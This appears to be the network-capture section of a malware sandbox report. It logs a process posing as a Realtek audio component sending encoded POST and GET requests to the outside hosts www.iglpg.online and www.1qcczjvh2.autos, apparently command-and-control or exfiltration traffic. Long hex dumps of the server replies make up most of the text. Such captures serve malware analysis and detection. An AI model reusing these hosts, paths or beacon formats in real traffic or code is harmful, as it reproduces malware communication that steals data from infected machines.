                                                                                        Data Raw: 13 1d ae cc 48 4d ea 01 d0 0c 1c d7 63 9d f7 9f 96 da 17 93 49 f4 3e 54 fe 64 db 00 1a 40 a3 6f 93 be 34 f2 aa d6 1a 79 ae 43 cb 0f 36 d0 24 a4 be 06 68 1e 72 17 ab 36 4a f7 8e 36 48 36 75 94 ed df 9b 6a b6 0a 97 2b 87 10 8b d2 99 97 42 e7 90 62 29 be f0 ff 78 77 01 9c 17 20 79 06 14 66 48 89 e7 21 25 9e 87 bc 14 fe 7f 3f ec 12 00 75 e4 e5 10 4b 4f ef a2 8d b9 ec 20 b9 a1 ba bb ce ad 5b af 63 a2 26 73 ef ca 2b 7d 94 e2 dd 32 34 ed 49 b6 7d 23 83 43 83 61 09 84 70 db 37 91 35 65 c3 7d 6f c1 24 2d a5 7c f1 2e 6a 43 a6 7d 7e 2e cd 02 b2 0d d6 ab f5 31 02 1a eb 39 d6 00 49 07 5e a1 61 24 ef bf 47 80 a5 db 58 a1 7e 57 c0 7e 1c 07 09 fa 15 fb dd 40 5b 13 76 fe 6a 1f 08 fb 4c 8c ac fe 87 56 88 33 54 28 d1 44 31 53 09 81 4b a7 a9 98 b6 02 6d 00 03 42 88 01 06 56 3c 2f ac cf fd ae 6d bb 2b ac 5f fe e1 ed 17 e3 57 68 4f 8e 3d 21 b0 0f 18 d6 66 ff b2 24 78 69 05 30 95 75 db ca 76 c4 76 a3 b3 9d b7 95 54 8c 9b 02 22 b6 b3 4d 0b 78 fc ab 96 8a fa 7c c6 df bb c1 fd 38 ff d2 ec 17 f5 f5 7f be fe 47 0f ba f7 d0 9a [TRUNCATED]
                                                                                        Data Ascii: HMcI>Td@o4yC6$hr6J6H6uj+Bb)xw yfH!%?uKO [c&s+}24I}#Cap75e}o$-|.jC}~.19I^a$GX~W~@[vjLV3T(D1SKmBV</m+_WhO=!f$xi0uvvT"Mx|8GJum`0N{=dUI@nmI@nvY)\6IG607|ps=p9~5.'[yBnIO%.79+$FZ>hY2H5p[9/EFFoO0L-tBAmuR,<""*f]pVW/f )4|bh#]Lu`d;4!Ug:Vl@C#x_<;2E~~n;1^:([ZDUiq8d,6c_F:]NeZQo1FVwXfQ@(zo.Y 3XZ(!LI)r/_b=mVa]q{DC.U0"TsZ2
                                                                                        Nov 27, 2024 11:29:58.448220968 CET1289INData Raw: 10 de 01 62 e1 8d 9a 65 bd e4 8d d1 57 55 b2 9b a7 f1 05 55 69 b3 8f 0e 2a a6 44 0c 21 15 66 98 31 6e 0c 81 1c 5d 20 d2 58 3f be 1a a7 03 39 1f db 77 40 53 a6 93 61 57 23 17 32 7c 89 c5 51 b9 25 49 94 11 7b 22 25 f1 2a b8 59 3e 9c a0 74 1f aa 5a
                                                                                        Data Ascii: beWUUi*D!f1n] X?9w@SaW#2|Q%I{"%*Y>tZ1V7\R"W:Q>c'!_!M_2KKf.[$2bdf@,V "@L4L?;N[;I@4Qt50F )j9]^e;(Sza9b;H'S7-v
                                                                                        Nov 27, 2024 11:29:58.448281050 CET1289INData Raw: b6 7c 41 08 53 3f 0b fc 10 21 da b2 41 c8 f8 6a 79 c1 93 52 71 26 04 67 89 66 21 85 74 07 8c 34 c2 1e 3f 1a f7 4c e6 ed 13 e2 9d d0 96 58 a5 1d 66 ea d3 be 32 c6 60 81 4a 8c b3 e5 11 ff ea cd 09 41 87 d3 b4 93 bb b0 8f db a3 d5 c4 ab 61 49 d8 cb
                                                                                        Data Ascii: |AS?!AjyRq&gf!t4?LXf2`JAaIcP59OqH%bmv12XG&(7[#i7Tz1{k"9ZN=j*]V'oxMI'VrF/cZSKUW"'x
                                                                                        Nov 27, 2024 11:29:58.448364019 CET1289INData Raw: 0b be 43 9d 5f b8 24 c5 3c 3b 38 d5 5f 5a a8 e9 6c 15 8e 84 f7 1c 6c ce c4 29 33 cc c5 a1 50 e7 51 85 1f 39 2e 9a 92 32 d5 04 d0 d9 07 8e 30 17 39 8d 1b 46 32 cc 79 82 45 5c 83 a6 b5 03 7d b9 92 62 b1 c7 70 3b 2c 99 13 d7 84 33 2d 86 df 1e 13 bc
                                                                                        Data Ascii: C_$<;8_Zll)3PQ9.209F2yE\}bp;,3-O@QL&4<C[LP.bhC[r3u37f~vw>hB1[U@w<yo%}}sB+?"nCa|XbB
                                                                                        Nov 27, 2024 11:29:58.448446989 CET1289INData Raw: 21 d3 1d ab 89 3a c2 82 20 fd 80 1a d2 52 f3 5a c0 ea 49 fa b2 52 0c e7 20 fe dd 9c 46 51 34 e3 52 4c 38 0a b0 59 1c ed 10 ab 2b 5d 90 2a 4d 34 11 18 46 17 05 9b df 85 c5 5e ac 0a 34 c8 47 50 cb 61 4c a2 b0 f4 0b 2c 4a d7 d9 40 42 d7 6f 57 32 39
                                                                                        Data Ascii: !: RZIR FQ4RL8Y+]*M4F^4GPaL,J@BoW29n;=J0}xI(EPv]xON\O<\"v!;v3$bZGsT2 6H<Y&@A;JE1uU.Y16,m$7
                                                                                        Nov 27, 2024 11:29:58.448791981 CET1289INData Raw: f8 52 47 40 66 4f 54 f1 e5 b5 20 75 b1 31 35 58 7a 22 95 ee 3e e4 ce 6d 9e 06 c2 5b 8d ac b9 a6 a4 2b e2 1b 6d c7 9f be bf 65 f0 dd b2 3e e1 df ff 70 ad 65 ca b9 6d dc 50 d1 f6 1f b7 f3 9a 85 9b 43 11 b0 d9 eb 0d a6 64 2c 37 f9 72 2a b6 82 8c 10
                                                                                        Data Ascii: RG@fOT u15Xz">m[+me>pemPCd,7r*O#?O_vq5pbZ?>,yFVLR8g$~o?\.,wg!%BRKs;|ojc6<6V\)(UTvHXm?I=*
                                                                                        Nov 27, 2024 11:29:58.448884964 CET1289INData Raw: b1 1a 2b 04 65 4b e0 71 f2 bb ad b3 0e 5a cf 72 26 32 f8 9b b5 d9 a4 a3 29 ec f1 7e 30 1d 48 69 70 36 13 40 ab ef c8 06 8e 3a 21 cc e6 2b 24 32 98 8f 05 0f 40 64 eb be fb 20 05 d1 e7 35 90 27 f3 ac fb 53 e7 8b 00 79 c1 4b f6 cf d6 68 d6 ac 5f fb
                                                                                        Data Ascii: +eKqZr&2)~0Hip6@:!+$2@d 5'SyKh_Q1`yst~{DO$mX;[:rYSHJB)FBr@{y-ogsHyR#+s4]kjk@d(wJ.[k@dBEFA+44bIt&lppMvv
                                                                                        Nov 27, 2024 11:29:58.448954105 CET435INData Raw: e5 95 b2 12 a2 26 85 1c 9a fd e1 72 d5 e2 fa fe 0e 7f 69 f6 49 9c 15 6c 69 a8 b3 ab 88 2a 61 d4 ec 2c 7b 08 9b 42 b5 73 13 ac b5 8d 2e 0e 22 4e 53 f6 d0 19 97 37 c5 03 2f 18 8a 3c 92 46 94 a3 1d 31 f6 91 3c c6 a3 27 37 83 13 d4 43 b5 25 a6 d5 6c
                                                                                        Data Ascii: &riIli*a,{Bs."NS7/<F1<'7C%llc*%,Zte;IK@"6s#Pm@[HkF\X_TVsfM7@1V:nmhh85;|{/sF8)


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        15192.168.11.2049760173.201.189.241807176C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 27, 2024 11:30:00.784394979 CET2578OUTPOST /rbqc/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Host: www.iglpg.online
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 7371
                                                                                        Origin: http://www.iglpg.online
                                                                                        Referer: http://www.iglpg.online/rbqc/
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                        Data Raw: 77 49 58 68 41 47 3d 36 4d 4a 54 4c 36 6b 4e 76 30 7a 48 79 49 57 70 4d 4a 38 4c 38 64 72 43 53 70 67 6e 67 4c 4e 48 51 77 2b 72 56 32 4f 69 58 45 46 79 59 6c 59 45 56 4d 55 73 32 6d 6c 2f 72 4b 53 6c 43 6f 7a 68 57 6f 51 50 63 58 6c 55 59 58 41 67 44 76 5a 77 47 31 58 71 69 37 56 35 51 57 36 56 66 4e 64 71 51 4b 78 34 4c 67 42 5a 6f 71 41 5a 79 6c 50 52 49 59 64 6e 74 75 6c 67 64 58 6d 38 6a 38 6e 76 57 2f 57 68 47 4e 6c 49 2b 59 59 37 41 79 4f 67 79 42 57 73 75 6c 6d 62 5a 39 2b 65 78 79 61 63 4d 56 47 79 69 53 4d 33 37 56 39 73 2b 57 2b 2b 56 45 68 70 42 61 79 71 77 77 68 55 41 65 59 78 46 4f 45 4b 4f 56 59 32 41 6c 6c 5a 68 46 67 63 31 59 34 46 62 67 6f 79 34 58 6a 66 49 4d 2b 69 49 62 51 59 38 64 52 57 61 36 49 57 35 79 53 66 66 64 67 70 4f 49 6a 75 52 75 73 30 43 7a 4a 31 6a 5a 56 49 78 48 30 77 39 44 77 53 78 77 6d 4b 58 44 4d 75 67 4f 51 51 72 42 47 4c 56 67 2f 75 61 74 63 4e 33 71 38 39 43 4c 7a 35 51 45 45 52 30 32 4f 2b 7a 51 43 79 36 56 76 42 43 31 70 74 43 5a 78 5a 65 33 5a 49 51 38 6a [TRUNCATED]
                                                                                        Data Ascii: wIXhAG=6MJTL6kNv0zHyIWpMJ8L8drCSpgngLNHQw+rV2OiXEFyYlYEVMUs2ml/rKSlCozhWoQPcXlUYXAgDvZwG1Xqi7V5QW6VfNdqQKx4LgBZoqAZylPRIYdntulgdXm8j8nvW/WhGNlI+YY7AyOgyBWsulmbZ9+exyacMVGyiSM37V9s+W++VEhpBayqwwhUAeYxFOEKOVY2AllZhFgc1Y4Fbgoy4XjfIM+iIbQY8dRWa6IW5ySffdgpOIjuRus0CzJ1jZVIxH0w9DwSxwmKXDMugOQQrBGLVg/uatcN3q89CLz5QEER02O+zQCy6VvBC1ptCZxZe3ZIQ8jpCzPl7we4CEJ3IGfvVVxfnbkkoO/ZVb424qzGm37PLche1cXvqSGyJt/T0WWfaDzlp0SI6DVfG2E3+9uwDz7aaLZME+RkHdD8433mCbnOeprWv1f+aTyE2ETyZmHzxz1c+/guHSZW3R3IKz42qI5DkGkazNkG7ha//d//MKdOw7ii45jeLFRUj9Os11d06H5zBkoNYnSWIDzo7ROJXJ1t5YlmuGB5pGrycmN5g6H8wIWmbMin53VzCTLp9SuvNdcR8A9ieNIisg5sP5Vp6ciRAHj99m5KUEww7wrQbCkZIdxAthszphng0WjegdFOMvKZLcwWJXA3gydleVM/BFdNXw7WW3pb3iMsao0+rexRB1ZL5veNv/Q5yWp8D2NZvbvuFS6lSr8pcQnXQdbSicMOHy8JA0SxudVAhbi0azIkuJJxMtjo1EQRe2Pdoi/VsYJcqCXMdJzqzfYDwXTyk5XayIhlwn+QS+U3pwChXwPOgQqslMGhp4v5YBYPoU89BkknqasOI2t+AT89CfmOjn2jnuDCWr7nRk0HoJxim1qTzD7QzfHyhgE/Q+LPTsIrkIhVe9qFwfb/dUN2SEUIv8MMoxy5Q6pdX8up6FpGPrv3GQeuunsT6OEgBKiJdrlHglh92jiQV5Zo22Y3or+O7FjxRxGwRywn8m5fu [TRUNCATED]
                                                                                        Nov 27, 2024 11:30:00.784439087 CET5262OUTData Raw: 6a 77 6d 6d 49 61 51 63 33 2b 52 4f 61 5a 53 75 78 39 6e 49 7a 53 2b 5a 2f 2f 44 4d 6c 79 6e 6a 72 75 76 53 42 36 6d 5a 68 48 74 78 63 73 56 5a 48 50 45 4c 63 6e 68 79 32 6e 67 58 39 69 6d 61 30 50 57 34 71 79 67 2f 76 36 7a 57 78 59 2b 62 66 34
                                                                                        Data Ascii: jwmmIaQc3+ROaZSux9nIzS+Z//DMlynjruvSB6mZhHtxcsVZHPELcnhy2ngX9ima0PW4qyg/v6zWxY+bf4Qs0b0zozMRfSbttdP+c4wPLLO8LVxm5MKMv5xt3ucnnt3WXr9YDeWpeLsSTsS/t63wNwUJOiaJZVI9O5Poe5XnBC3566l8eFagIJKD0Gdz85ZuVonNUwSC0IuLqyjapSKY0mWQEXl5ZrCLcQoPKFccCag8p5dUdpl
                                                                                        Nov 27, 2024 11:30:01.232091904 CET1289INHTTP/1.1 404 Not Found
                                                                                        Date: Wed, 27 Nov 2024 10:30:00 GMT
                                                                                        Server: Apache
                                                                                        X-Powered-By: PHP/8.2.24
                                                                                        X-DNS-Prefetch-Control: on
                                                                                        X-LiteSpeed-Tag: 844_HTTP.404
                                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                        Link: <https://iglpg.online/wp-json/>; rel="https://api.w.org/"
                                                                                        Upgrade: h2,h2c
                                                                                        Connection: Upgrade, close
                                                                                        Vary: Accept-Encoding
                                                                                        Content-Encoding: br
                                                                                        Content-Length: 8984
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 13 1d ae cc 48 4d ea 01 d0 0c 1c d7 63 9d f7 9f 96 da 17 93 49 f4 3e 54 fe 64 db 00 1a 40 a3 6f 93 be 34 f2 aa d6 1a 79 ae 43 cb 0f 36 d0 24 a4 be 06 68 1e 72 17 ab 36 4a f7 8e 36 48 36 75 94 ed df 9b 6a b6 0a 97 2b 87 10 8b d2 99 97 42 e7 90 62 29 be f0 ff 78 77 01 9c 17 20 79 06 14 66 48 89 e7 21 25 9e 87 bc 14 fe 7f 3f ec 12 00 75 e4 e5 10 4b 4f ef a2 8d b9 ec 20 b9 a1 ba bb ce ad 5b af 63 a2 26 73 ef ca 2b 7d 94 e2 dd 32 34 ed 49 b6 7d 23 83 43 83 61 09 84 70 db 37 91 35 65 c3 7d 6f c1 24 2d a5 7c f1 2e 6a 43 a6 7d 7e 2e cd 02 b2 0d d6 ab f5 31 02 1a eb 39 d6 00 49 07 5e a1 61 24 ef bf 47 80 a5 db 58 a1 7e 57 c0 7e 1c 07 09 fa 15 fb dd 40 5b 13 76 fe 6a 1f 08 fb 4c 8c ac fe 87 56 88 33 54 28 d1 44 31 53 09 81 4b a7 a9 98 b6 02 6d 00 03 42 88 01 06 56 3c 2f ac cf fd ae 6d bb 2b ac 5f fe e1 ed 17 e3 57 68 4f 8e 3d 21 b0 0f 18 d6 66 ff b2 24 78 69 05 30 95 75 db ca 76 c4 76 a3 b3 9d b7 95 54 8c 9b 02 22 b6 b3 4d 0b 78 fc ab 96 8a fa 7c c6 df bb c1 fd 38 ff d2 ec 17 f5 f5 7f be fe 47 0f ba f7 d0 9a [TRUNCATED]
                                                                                        Data Ascii: HMcI>Td@o4yC6$hr6J6H6uj+Bb)xw yfH!%?uKO [c&s+}24I}#Cap75e}o$-|.jC}~.19I^a$GX~W~@[vjLV3T(D1SKmBV</m+_WhO=!f$xi0uvvT"Mx|8GJum`0N{=dUI@nmI@nvY)\6IG607|ps=p9~5.'[yBnIO%.79+$FZ>hY2H5p[9/EFFoO0L-tBAmuR,<""*f]pVW/f )4|bh#]Lu`d;4!Ug:Vl@C#x_<;2E~~n;1^:([ZDUiq8d,6c_F:]NeZQo1FVwXfQ@(zo.Y 3XZ(!LI)r/_b=mVa]q{DC.U0"TsZ2
                                                                                        Nov 27, 2024 11:30:01.232172012 CET1289INData Raw: 10 de 01 62 e1 8d 9a 65 bd e4 8d d1 57 55 b2 9b a7 f1 05 55 69 b3 8f 0e 2a a6 44 0c 21 15 66 98 31 6e 0c 81 1c 5d 20 d2 58 3f be 1a a7 03 39 1f db 77 40 53 a6 93 61 57 23 17 32 7c 89 c5 51 b9 25 49 94 11 7b 22 25 f1 2a b8 59 3e 9c a0 74 1f aa 5a
                                                                                        Data Ascii: beWUUi*D!f1n] X?9w@SaW#2|Q%I{"%*Y>tZ1V7\R"W:Q>c'!_!M_2KKf.[$2bdf@,V "@L4L?;N[;I@4Qt50F )j9]^e;(Sza9b;H'S7-v
                                                                                        Nov 27, 2024 11:30:01.232554913 CET1289INData Raw: b6 7c 41 08 53 3f 0b fc 10 21 da b2 41 c8 f8 6a 79 c1 93 52 71 26 04 67 89 66 21 85 74 07 8c 34 c2 1e 3f 1a f7 4c e6 ed 13 e2 9d d0 96 58 a5 1d 66 ea d3 be 32 c6 60 81 4a 8c b3 e5 11 ff ea cd 09 41 87 d3 b4 93 bb b0 8f db a3 d5 c4 ab 61 49 d8 cb
                                                                                        Data Ascii: |AS?!AjyRq&gf!t4?LXf2`JAaIcP59OqH%bmv12XG&(7[#i7Tz1{k"9ZN=j*]V'oxMI'VrF/cZSKUW"'x
                                                                                        Nov 27, 2024 11:30:01.232573032 CET1289INData Raw: 0b be 43 9d 5f b8 24 c5 3c 3b 38 d5 5f 5a a8 e9 6c 15 8e 84 f7 1c 6c ce c4 29 33 cc c5 a1 50 e7 51 85 1f 39 2e 9a 92 32 d5 04 d0 d9 07 8e 30 17 39 8d 1b 46 32 cc 79 82 45 5c 83 a6 b5 03 7d b9 92 62 b1 c7 70 3b 2c 99 13 d7 84 33 2d 86 df 1e 13 bc
                                                                                        Data Ascii: C_$<;8_Zll)3PQ9.209F2yE\}bp;,3-O@QL&4<C[LP.bhC[r3u37f~vw>hB1[U@w<yo%}}sB+?"nCa|XbB
                                                                                        Nov 27, 2024 11:30:01.232672930 CET1289INData Raw: 21 d3 1d ab 89 3a c2 82 20 fd 80 1a d2 52 f3 5a c0 ea 49 fa b2 52 0c e7 20 fe dd 9c 46 51 34 e3 52 4c 38 0a b0 59 1c ed 10 ab 2b 5d 90 2a 4d 34 11 18 46 17 05 9b df 85 c5 5e ac 0a 34 c8 47 50 cb 61 4c a2 b0 f4 0b 2c 4a d7 d9 40 42 d7 6f 57 32 39
                                                                                        Data Ascii: !: RZIR FQ4RL8Y+]*M4F^4GPaL,J@BoW29n;=J0}xI(EPv]xON\O<\"v!;v3$bZGsT2 6H<Y&@A;JE1uU.Y16,m$7
                                                                                        Nov 27, 2024 11:30:01.232795954 CET1289INData Raw: f8 52 47 40 66 4f 54 f1 e5 b5 20 75 b1 31 35 58 7a 22 95 ee 3e e4 ce 6d 9e 06 c2 5b 8d ac b9 a6 a4 2b e2 1b 6d c7 9f be bf 65 f0 dd b2 3e e1 df ff 70 ad 65 ca b9 6d dc 50 d1 f6 1f b7 f3 9a 85 9b 43 11 b0 d9 eb 0d a6 64 2c 37 f9 72 2a b6 82 8c 10
                                                                                        Data Ascii: RG@fOT u15Xz">m[+me>pemPCd,7r*O#?O_vq5pbZ?>,yFVLR8g$~o?\.,wg!%BRKs;|ojc6<6V\)(UTvHXm?I=*
                                                                                        Nov 27, 2024 11:30:01.232815981 CET1289INData Raw: b1 1a 2b 04 65 4b e0 71 f2 bb ad b3 0e 5a cf 72 26 32 f8 9b b5 d9 a4 a3 29 ec f1 7e 30 1d 48 69 70 36 13 40 ab ef c8 06 8e 3a 21 cc e6 2b 24 32 98 8f 05 0f 40 64 eb be fb 20 05 d1 e7 35 90 27 f3 ac fb 53 e7 8b 00 79 c1 4b f6 cf d6 68 d6 ac 5f fb
                                                                                        Data Ascii: +eKqZr&2)~0Hip6@:!+$2@d 5'SyKh_Q1`yst~{DO$mX;[:rYSHJB)FBr@{y-ogsHyR#+s4]kjk@d(wJ.[k@dBEFA+44bIt&lppMvv
                                                                                        Nov 27, 2024 11:30:01.232898951 CET435INData Raw: e5 95 b2 12 a2 26 85 1c 9a fd e1 72 d5 e2 fa fe 0e 7f 69 f6 49 9c 15 6c 69 a8 b3 ab 88 2a 61 d4 ec 2c 7b 08 9b 42 b5 73 13 ac b5 8d 2e 0e 22 4e 53 f6 d0 19 97 37 c5 03 2f 18 8a 3c 92 46 94 a3 1d 31 f6 91 3c c6 a3 27 37 83 13 d4 43 b5 25 a6 d5 6c
                                                                                        Data Ascii: &riIli*a,{Bs."NS7/<F1<'7C%llc*%,Zte;IK@"6s#Pm@[HkF\X_TVsfM7@1V:nmhh85;|{/sF8)


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        16192.168.11.2049761173.201.189.241807176C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 27, 2024 11:30:03.485831976 CET409OUTGET /rbqc/?wIXhAG=3OhzIPQDpE/WyOq4c50vyvr5MYwPqIJwFHC8VhGgYWlBNCQMRbA04kkXhcibOdGaaYQUE3h/dXM8I7VGN3rlp7Z3JwGHCuU5fs1gPxd74qpwzz3mNpUi2rk=&67ssp=tVX5mtZ66UVF HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Host: www.iglpg.online
                                                                                        Connection: close
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                        Nov 27, 2024 11:30:04.013653040 CET615INHTTP/1.1 301 Moved Permanently
                                                                                        Date: Wed, 27 Nov 2024 10:30:03 GMT
                                                                                        Server: Apache
                                                                                        X-Powered-By: PHP/8.2.24
                                                                                        X-DNS-Prefetch-Control: on
                                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                        X-LiteSpeed-Tag: 844_HTTP.404,844_HTTP.301
                                                                                        X-Redirect-By: WordPress
                                                                                        Upgrade: h2,h2c
                                                                                        Connection: Upgrade, close
                                                                                        Location: http://iglpg.online/rbqc/?wIXhAG=3OhzIPQDpE/WyOq4c50vyvr5MYwPqIJwFHC8VhGgYWlBNCQMRbA04kkXhcibOdGaaYQUE3h/dXM8I7VGN3rlp7Z3JwGHCuU5fs1gPxd74qpwzz3mNpUi2rk=&67ssp=tVX5mtZ66UVF
                                                                                        Vary: Accept-Encoding
                                                                                        Content-Length: 0
                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        17192.168.11.204976243.163.1.110807176C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 27, 2024 11:30:09.650625944 CET680OUTPOST /pfw9/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Host: www.1qcczjvh2.autos
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 203
                                                                                        Origin: http://www.1qcczjvh2.autos
                                                                                        Referer: http://www.1qcczjvh2.autos/pfw9/
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                        Data Raw: 77 49 58 68 41 47 3d 31 37 4e 5a 56 42 4c 76 68 31 67 34 45 78 6f 6e 6a 4a 45 4f 37 62 54 49 76 67 72 6f 38 49 73 4a 6f 70 65 63 65 6c 39 4c 59 6c 4c 79 77 63 59 42 2f 69 4f 47 71 43 34 4e 50 6b 44 4f 2b 59 66 68 7a 73 38 33 4f 35 42 4c 53 62 49 49 4a 71 78 39 4b 5a 4b 47 4e 32 31 79 45 32 31 41 51 35 72 6a 66 75 55 63 47 46 52 51 47 68 68 32 4a 56 39 77 5a 2b 4f 52 32 49 6b 65 71 68 49 7a 47 67 32 30 6f 47 56 73 76 48 56 52 42 42 49 42 6a 69 56 4a 57 52 55 71 37 79 33 48 58 30 6c 49 58 42 6f 49 4c 74 7a 68 36 6b 42 32 37 32 77 38 61 62 61 44 7a 33 34 52 4c 64 55 4b 51 2b 75 5a 6f 6b 46 4a 4b 51 3d 3d
                                                                                        Data Ascii: wIXhAG=17NZVBLvh1g4ExonjJEO7bTIvgro8IsJopecel9LYlLywcYB/iOGqC4NPkDO+Yfhzs83O5BLSbIIJqx9KZKGN21yE21AQ5rjfuUcGFRQGhh2JV9wZ+OR2IkeqhIzGg20oGVsvHVRBBIBjiVJWRUq7y3HX0lIXBoILtzh6kB272w8abaDz34RLdUKQ+uZokFJKQ==
                                                                                        Nov 27, 2024 11:30:09.984363079 CET1289INHTTP/1.1 404 Not Found
                                                                                        Server: Tengine
                                                                                        Date: Wed, 27 Nov 2024 10:30:09 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Content-Length: 58288
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        ETag: "67344967-e3b0"
                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f [TRUNCATED]
                                                                                        Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%;padding-top: 12%;}.logo img { display: block; width: 100px;}.logo img + img { margin-top: 12px;}.title {margin-top: 24px;font-size: 110px;color: #333;letter-spacing: 10px;}.desc {font-size: 16px;color: #777;text-align: center;line-height: 24px;}.footer {/* position: absolute;left: 0;bottom: 32px;width: 100%; */margin-top: 24px;text-align: center;font-size: 12px;}.footer .btlink {color: #20a53a;text-decoration: no [TRUNCATED]
                                                                                        Nov 27, 2024 11:30:09.984461069 CET1289INData Raw: 76 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 0a 09 09 09 09 3c 69 6d 67 20 73 72 63 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 53 77 41 41 41
                                                                                        Data Ascii: v class="logo"><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAASwAAAEDCAYAAACPhzmWAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAt+wAALfsB/IdK5wAAABx0RVh0U29mdHdhcmUAQWRvYmUgRmlyZXdvcmtzIENTNui8sowAACAASURBVHic7J13eBRVF8bfMzPb0hNK6CAgVUCC9JJ
                                                                                        Nov 27, 2024 11:30:09.984514952 CET1289INData Raw: 65 2b 62 6a 71 39 61 44 35 2f 59 33 79 4c 62 59 6f 6c 6b 41 49 68 77 36 59 33 6d 32 75 2f 67 7a 77 30 46 45 4a 6a 76 47 67 4b 6f 78 32 50 72 39 68 4f 49 78 32 47 35 45 51 4a 65 4c 33 6a 4d 49 6f 6c 64 44 39 33 34 70 74 50 39 6e 4b 79 52 41 54 35
                                                                                        Data Ascii: e+bjq9aD5/Y3yLbYolkAIhw6Y3m2u/gzw0FEJjvGgKox2Pr9hOIx2G5EQJeL3jMIoldD934ptP9nKyRAT5c2IEY0+SVW00j4Uf7QDZHUVo3dvUJh4qcxjGwBtcz06NX9h7x+YauPaf/kXy/pVpFg4fMz6wFHuGFXPIijWnr58bOPtF4HJab2HRuXn0AIYWdu5+TYbgxeN+x7dvTTSjHHwCPiXg4MLEwUl3eSQ8PyLRzXsgVrR/u
                                                                                        Nov 27, 2024 11:30:09.984591007 CET1289INData Raw: 43 5a 45 72 71 65 69 72 5a 4f 45 69 46 35 37 66 6c 7a 41 6b 42 4b 46 6d 53 50 32 6a 71 35 37 4d 6a 34 4d 67 44 57 51 52 62 34 43 38 36 79 57 4e 6f 6c 37 7a 30 53 49 7a 47 57 6d 4d 39 4d 43 31 6d 61 5a 6c 50 6a 46 5a 30 6d 4e 53 35 44 43 6d 37 37
